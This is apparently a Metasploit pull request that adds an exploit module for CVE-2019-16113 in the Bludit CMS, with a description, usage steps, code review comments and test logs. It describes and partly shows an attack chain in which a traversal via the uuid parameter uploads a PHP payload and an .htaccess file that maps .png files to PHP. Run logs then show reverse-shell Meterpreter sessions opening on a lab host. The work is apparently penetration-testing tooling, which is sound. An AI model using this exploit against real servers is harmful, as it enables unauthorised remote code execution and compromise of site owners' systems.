### PR TITLE
Add CVE-2019-16113: Bludit Directory Traversal Image Upload Exploit

### PR DESCRIPTION
**Pull request by wchen-r7**
# Bludit Directory Traversal Image File Upload Vulnerability

## Description

This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by [christasa](https://github.com/christasa) in the image uploading feature. A remote user could the uuid parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom .htaccess file to bypass the file extension check, and finally get remote code execution.

## Setup

1. Set up a Ubuntu box with Apache, PHP, and MySQL.
2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
3. Follow the installation guide [here](https://docs.bludit.com/en/getting-started/installation-guide). Make sure your Apache server sets `AllowOverride All` in /etc/apache2/apache2.conf.

## Verification Steps

- [ ] Start msfconsole
- [ ] `use exploit/linux/http/bludit_upload_images_exec`
- [ ] `set rhosts [IP]`
- [ ] `set bludituser [user]`
- [ ] `set bluditpass [pass]`
- [ ] `set payload php/meterperter/reverse_tcp`
- [ ] `set lhost [ip]`
- [ ] `run`, you should get a session like the following demo:

```
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
```

### CODE REVIEW

**Comment by atxsinn3r** [comment]
Thanks for reviewing. I'll fix them up.

File: modules/exploits/linux/http/bludit_upload_images_exec.rb [hunk 1]
```diff
@@ -0,0 +1,266 @@
...
+    php_payload = get_php_payload
+    upload_file(login_badge, '../../tmp', php_payload.payload, php_payload.name)
+
+    # On the vuln app, this line occurs first:
+    # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
+    # Even though there is a file extension check, it won't really stop us
+    # from uploading the .htaccess file.
+    htaccess = %Q|RewriteEngine off
+    AddType application/x-httpd-php .png
+    |.gsub(/^\x20{4}/, '')
```
[the remark this answers is not in the document]
Comment (acammack-r7) [reply modules/exploits/linux/http/bludit_upload_images_exec.rb]: Also:
```ruby
    htaccess = <<~HTA
      RewriteEngine off
      AddType application/x-httpd-php .png
    HTA

File: modules/exploits/linux/http/bludit_upload_images_exec.rb [hunk 2]
```diff
@@ -0,0 +1,266 @@
...
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Bluedit Directory Traversal Image File Upload Vulnerability",
```
Comment (space-r7) [inline modules/exploits/linux/http/bludit_upload_images_exec.rb]: Should this be Bludit?

```suggestion
      'Name'           => "Bludit Directory Traversal Image File Upload Vulnerability",
```

File: modules/exploits/linux/http/bludit_upload_images_exec.rb [hunk 3]
```diff
@@ -0,0 +1,266 @@
...
+      'Arch'           => ARCH_PHP,
+      'Notes'          =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'Targets'        =>
+        [
+          [ 'Bluedit v3.9.2', {} ]
```
Comment (space-r7) [inline modules/exploits/linux/http/bludit_upload_images_exec.rb]:
```suggestion
          [ 'Bludit v3.9.2', {} ]
```

File: modules/exploits/linux/http/bludit_upload_images_exec.rb [hunk 4]
```diff
@@ -0,0 +1,266 @@
...
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "2019-09-07",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Bluedit', '/']),
```
Comment (space-r7) [inline modules/exploits/linux/http/bludit_upload_images_exec.rb]:
```suggestion
        OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']),
```

File: modules/exploits/linux/http/bludit_upload_images_exec.rb [hunk 5]
```diff
@@ -0,0 +1,266 @@
...
+        OptString.new('BLUDITUSER', [true, 'The username for Bluedit']),
```
Comment (space-r7) [inline modules/exploits/linux/http/bludit_upload_images_exec.rb]:
```suggestion
        OptString.new('BLUDITUSER', [true, 'The username for Bludit']),
```

File: modules/exploits/linux/http/bludit_upload_images_exec.rb [hunk 6]
```diff
@@ -0,0 +1,266 @@
...
+        OptString.new('BLUDITPASS', [true, 'The password for Bluedit'])
```
Comment (space-r7) [inline modules/exploits/linux/http/bludit_upload_images_exec.rb]:
```suggestion
        OptString.new('BLUDITPASS', [true, 'The password for Bludit'])
```

**Comment by wchen-r7** [comment]
@space-r7 Yup I made some typos. I will correct them once I have write access again to Github. Thanks.

**Comment by wchen-r7** [comment]
This is good to go again.

**Comment by space-r7** [comment]
> This is good to go again.

I'll set up an environment, then test and land. Thanks!

**Comment by space-r7** [comment]
Tested on Bludit `v3.9.2`:

```
msf5 > use exploit/linux/http/bludit_upload_images_exec 
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser admin
bludituser => admin
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass password
bluditpass => password
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 192.168.37.165
rhosts => 192.168.37.165
msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 192.168.37.165:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading cqAWnwRSUh.png...
[*] Uploading .htaccess...
[*] Executing cqAWnwRSUh.png...
[*] Sending stage (38288 bytes) to 192.168.37.165
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.165:46068) at 2019-11-12 15:31:32 -0600
[+] Deleted .htaccess

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux
```

**Comment by space-r7** [comment]
## Release Notes

This adds an exploit module for Bludit, an open source CMS. For versions below `v3.10.0`, there is a vulnerability in the file upload functionality that allows an attacker to upload a file anywhere on the system by changing the `uuid` value in the upload request. An attacker can gain code execution by uploading a payload and uploading a new `.htaccess` file to bypass extension checks.

**Pull request merged**